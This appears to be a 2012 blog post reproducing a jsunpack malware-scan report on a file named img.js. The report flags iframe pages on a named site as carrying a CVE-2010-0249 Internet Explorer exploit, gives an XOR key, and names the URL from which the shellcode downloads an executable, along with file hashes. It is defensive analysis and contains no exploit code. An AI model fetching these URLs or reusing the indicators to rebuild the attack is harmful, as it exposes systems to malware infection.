JSUNPACK

2012. 2. 5. 19:28 Development/Hacking

JSUNPACK
A Generic JavaScript Unpacker
CAUTION: jsunpack was designed for security researchers and computer professionals
http://jsunpack.jeek.org/dec/go?report=8f3d0bc86a4041333de321f968d69d8c488b8812
Disable JavaScript when opening the contents of the following document.

Submission permanent link 8f3d0bc86a4041333de321f968d69d8c488b8812 (Received 2010-10-21 07:26:09, img.js ) 

URL Status

All Malicious or Suspicious Elements of Submission

suspicious: script analysis exceeded 30 seconds (incomplete) 42953 bytes
malicious: Alert detected /alert CVE-2010-0249 MSIEUseAfterFree (CreateElement called 499 times)
suspicious: Warning detected /warning CVE-NO-MATCH Shellcode NOP len 523545 /warning CVE-NO-MATCH Shellcode Engine Binary Threshold /warning CVE-NO-MATCH Shellcode Engine Length 65536
suspicious: shellcode of length 1327/716
malicious: shellcode URL=www.yunsheng.com/images/s.exe
malicious: Alert detected /alert CVE-2010-0249 MSIEUseAfterFree (CreateElement called 999 times)
suspicious: Warning detected /warning CVE-NO-MATCH Shellcode Engine Length 65536
suspicious: shellcode of length 979/490
malicious: XOR key [shellcode]: 189
malicious: shellcode [xor] URL=www.yunsheng.com/images/s.exe
malicious: client download shellcode URL (executable) saved (559ea14179ed7dcefbba88302bcc8be6a307ea6b)


www.igo88.com/css/sky.html malicious
[malicious:10] (ipaddr:121.37.59.229) (iframe) www.igo88.com/css/sky.html
     status: (referer=www.google.com/trends/hottrends)saved 9835 bytes efd0bfa1e21c95ee6e90f3986c00ef72f94fce5c
     info: [decodingLevel=0] found JavaScript
     suspicious: script analysis exceeded 30 seconds (incomplete) 42953 bytes
     malicious: Alert detected /alert CVE-2010-0249 MSIEUseAfterFree (CreateElement called 499 times)
     suspicious: Warning detected /warning CVE-NO-MATCH Shellcode NOP len 523545 /warning CVE-NO-MATCH Shellcode Engine Binary Threshold /warning CVE-NO-MATCH Shellcode Engine Length 65536
     suspicious: shellcode of length 1327/716
     malicious: shellcode URL=www.yunsheng.com/images/s.exe
     info: [decodingLevel=1] found JavaScript
     error: undefined variable sNKc
     malicious: Alert detected /alert CVE-2010-0249 MSIEUseAfterFree (CreateElement called 999 times)
     suspicious: Warning detected /warning CVE-NO-MATCH Shellcode Engine Length 65536
     info: [decodingLevel=2] found JavaScript
     info: [3] no JavaScript
     info: file: saved www.igo88.com/css/sky.html to (efd0bfa1e21c95ee6e90f3986c00ef72f94fce5c)
     file: efd0bfa1e21c95ee6e90f3986c00ef72f94fce5c: 9835 bytes
     file: 827db97275c50f0fbdcd06c3211af9440e2c1cc7: 10076 bytes
     file: ddb8a49528a992cbed7615e83c331f86a7e65932: 42953 bytes
     file: 20de19d4441573e4af7d1dab8956d8a2df2254a9: 1327 bytes
     file: d153954059f16cb9f91edb12422c0d722d7de3e7: 67358 bytes
     file: 64a63eda847300a48b6a5dc71910bf5aaa679a16: 33127 bytes

Decoded Files
efd0/bfa1e21c95ee6e90f3986c00ef72f94fce5c from www.igo88.com/css/sky.html (9835 bytes, 9 hidden) download



827d/b97275c50f0fbdcd06c3211af9440e2c1cc7 from www.igo88.com/css/sky.html (10076 bytes, 8 hidden) download



ddb8/a49528a992cbed7615e83c331f86a7e65932 from www.igo88.com/css/sky.html (42953 bytes, 42 hidden) download




20de/19d4441573e4af7d1dab8956d8a2df2254a9 from www.igo88.com/css/sky.html (1327 bytes, 875 hidden) download



d153/954059f16cb9f91edb12422c0d722d7de3e7 from www.igo88.com/css/sky.html (67358 bytes, 42 hidden) download



64a6/3eda847300a48b6a5dc71910bf5aaa679a16 from www.igo88.com/css/sky.html (33127 bytes) download 



www.igo88.com/css/kol.htm malicious
[malicious:10] (ipaddr:121.37.59.229) (iframe) www.igo88.com/css/kol.htm
     status: (referer=www.google.com/trends/hottrends)saved 13029 bytes 2b9a1cfa33279c01745f2c414f1eee05eaa0c5cf
     info: [decodingLevel=0] found JavaScript
     suspicious: shellcode of length 979/490
     malicious: XOR key [shellcode]: 189
     malicious: shellcode [xor] URL=www.yunsheng.com/images/s.exe
     info: [decodingLevel=1] found JavaScript
     info: [decodingLevel=2] found JavaScript
     info: [decodingLevel=3] found JavaScript
     info: file: saved www.igo88.com/css/kol.htm to (2b9a1cfa33279c01745f2c414f1eee05eaa0c5cf)
     file: 2b9a1cfa33279c01745f2c414f1eee05eaa0c5cf: 13029 bytes
     file: da3e6540315278ee64e9f10d9ccbb1a007a03510: 15702 bytes
     file: 9a4df3a4984bd67010103c066135116397bf8af4: 979 bytes
     file: 375f525c58197b96b89d36527188720c254e4fd9: 3526 bytes
     file: 4d7adcdccf102d45fa32ea82f87d6a875ac25055: 446 bytes